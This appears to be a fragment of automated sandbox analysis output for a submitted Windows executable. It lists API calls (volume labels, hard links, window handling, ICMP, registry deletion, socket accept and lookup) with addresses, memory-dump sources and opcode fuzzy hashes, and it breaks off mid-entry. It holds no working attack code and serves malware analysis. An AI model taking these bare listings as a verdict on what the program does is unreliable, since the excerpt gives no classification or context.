• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
• Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
• Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
• Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
• Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
• Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
• Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
• Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
• Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
• Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                        APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Similarity
                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 2782032738-0
                                                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                        APIs
                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                        Similarity
                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1352109105-0
                                                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                        APIs
                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                        Similarity
                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3321077145-0
                                                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                        Similarity
                                                                                                        • API ID: Proc$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2351499541-0
                                                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                        APIs
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1795658109-0
                                                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2759813231-0
                                                                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2886238975-0
                                                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1792727568-0
                                                                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                        APIs
                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                        • String ID:
                                                                                                        • API String ID: 2169480361-0
                                                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                        • String ID: cdecl
                                                                                                        • API String ID: 3850814276-3896280584
                                                                                                        • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                        • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                        APIs
                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                        • String ID:
                                                                                                        • API String ID: 2502553879-0
                                                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 312131281-0
                                                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                        APIs
                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
